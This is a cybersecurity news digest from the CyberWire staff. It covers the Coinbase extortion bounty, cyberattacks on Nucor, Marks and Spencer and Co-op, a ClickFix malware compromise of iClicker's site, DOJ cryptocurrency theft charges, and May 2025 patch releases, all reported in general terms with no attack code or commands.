By the CyberWire staff
At a glance.
- Coinbase offers $20 million bounty for arrest of extortionists.
- US steel manufacturer hit by cyberattack.
- Marks and Spencer confirms customer data was stolen during cyberattack.
- Co-op continues recovery from cyberattack.
- iClicker website compromised to deliver malware.
- US DOJ charges twelve more suspects in theft of $263 million in cryptocurrency.
- Microsoft patches five actively exploited zero-days.
Coinbase offers $20 million bounty for arrest of extortionists.
Cryptocurrency exchange operator Coinbase has disclosed an extortion attempt involving theft of customer data, the Record reports. The company refused to pay a $20 million ransom demand, and is instead offering $20 million for information leading to the arrest of the crooks.
Coinbase stated, "Cyber criminals bribed and recruited a group of rogue overseas support agents to steal Coinbase customer data to facilitate social engineering attacks. These insiders abused their access to customer support systems to steal the account data for a small subset of customers. No passwords, private keys, or funds were exposed and Coinbase Prime accounts are untouched. We will reimburse customers who were tricked into sending funds to the attacker."
Coinbase Chief Security Officer Philip Martin told Fortune that the bribed workers, who were located in India, have been fired.
US steel manufacturer hit by cyberattack.
North Carolina-based Nucor, one of the largest steel manufacturers in the world, has disclosed a cyberattack that led to "unauthorized third party access to certain information technology systems." The company took certain systems offline as a precaution, which halted production at some locations. The company says it is "currently in the process of restarting the affected operations," and is "actively investigating the incident with the assistance of leading external cybersecurity experts."
Manufacturing Dive notes that Nucor produces around a quarter of all raw steel in the US.
Control what runs in your environment. Reduce your attack surface.
ThreatLocker helps organizations reduce risk by allowing trusted applications to run while limiting their access to only the resources they need. It’s a straightforward, default deny approach that gives you more control and visibility—without slowing down operations. Explore how ThreatLocker can help simplify your security strategy.
Marks and Spencer confirms customer data was stolen during cyberattack.
British retailer Marks and Spencer (M&S) has confirmed that customer data was stolen during last month's ransomware attack, BleepingComputer reports. The company says the leaked data includes "name, email address, addresses, telephone number, date of birth, online order history, household information, and ‘masked’ payment card details used for online purchases." M&S said in a Facebook post that the data "does not include usable card or payment details, or account passwords," but the company is forcing password resets for customer accounts as a precaution.
The company also warns customers to be on the lookout for phishing attacks exploiting the leaked information: "You do not need to take any action, but you might receive emails, calls, or texts claiming to be from M&S when they are not, so do be cautious. We will never contact you and ask you to provide us with personal account information, like usernames, and we will never ask you to give us your password."
Co-op continues recovery from cyberattack.
UK retail chain Co-op says systems are now running normally following a cyberattack earlier this month, Reuters reports. The incident disrupted grocery resupplies at some stores, leaving food shelves empty. The company says deliveries are back to normal, and stores should be better-stocked this weekend.
The DragonForce ransomware gang claims to have stolen information belonging to 20 million people who signed up for Co-op's membership program, BleepingComputer reports. Co-op hasn't confirmed this exact number, but said the attackers accessed data belonging to "a significant number of our current and past members." The breached information includes "Co-op Group members' personal data such as names and contact details, and did not include members' passwords, bank or credit card details, transactions or information relating to any members' or customers' products or services with the Co-op Group."
On-demand webinar: On the State of modern web application security.
Web applications remain a top attack vector for cybercriminals, according to the latest Verizon DBIR. Take a listen to the on-demand discussion with Outpost24 and N2K CyberWire’s Dave Bittner on today’s web application threats, vulnerabilities, and practical strategies to strengthen your defenses. Register now to access it on-demand.
iClicker website compromised to deliver malware.
The website of iClicker, a popular student response and classroom engagement platform, was compromised to display a ClickFix social engineering attack designed to trick users into installing malware, BeyondMachines reports. ClickFix is a technique that silently copies a malicious command to the Windows clipboard, then instructs users open a Run prompt, press Ctrl-V to paste, and hit Enter to run the command. In this case, the attack posed as a phony CAPTCHA verification prompt.
iClicker's site was compromised between April 12th and April 16th. Users who visited the site during that time and followed the directions of the fake CAPTCHA should be aware that they were likely infected.
US DOJ charges twelve more suspects in theft of $263 million in cryptocurrency.
The US Justice Department has charged twelve additional individuals for their alleged roles in "a cyber-enabled racketeering conspiracy throughout the United States and abroad that netted them more than $263 million." The defendants are accused of various activities related to cryptocurrency theft, including carrying out physical burglaries to steal hardware wallets. Several of the suspects were arrested in California this week, while two are believed to be living abroad in Dubai.
The Justice Department stated, "The various roles included database hackers, organizers, target identifiers, callers, money launderers, and residential burglars targeting hardware virtual currency wallets. Database hackers hacked websites and servers to obtain cryptocurrency-related databases or purchased databases on the darkweb. Organizers and target identifiers organized and collated information across the databases to determine the most valuable targets. Callers cold-called victims and used social engineering to convince them their accounts were the subject of cyberattacks and the enterprise callers were attempting to help secure their accounts. Money launderers received the stolen crypto currency and turned it into fiat U.S. currency in the form of bulk cash or wire transfers."
Patch news.
Microsoft's May 2025 Patch Tuesday fixed five actively exploited zero-days, as well as two other zero-days that were publicly disclosed with no observed exploitation, BleepingComputer reports. KrebsOnSecurity notes that two of the zero-days (CVE-2025-32701 and CVE-2025-32706) affect the Windows Common Log File System (CLFS) driver, and are being used in attacks to escalate privileges.
Patch Tuesday also saw fixes from Adobe, Apple, SAP, Ivanti, Fortinet, Juniper Networks, VMware, and Zoom. ICS companies Siemens, Schneider Electric, and Phoenix Contact have patched vulnerabilities affecting industrial devices, SecurityWeek reports.
Google has issued emergency security updates to fix a high-severity vulnerability (CVE-2025-4664) affecting Chrome, BleepingComputer reports. The vulnerability is an insufficient policy enforcement that can allow "a remote attacker to leak cross-origin data via a crafted HTML page." It's not clear if the flaw is under active exploitation, but Google says it's "aware of reports that an exploit for CVE-2025-4664 exists in the wild."
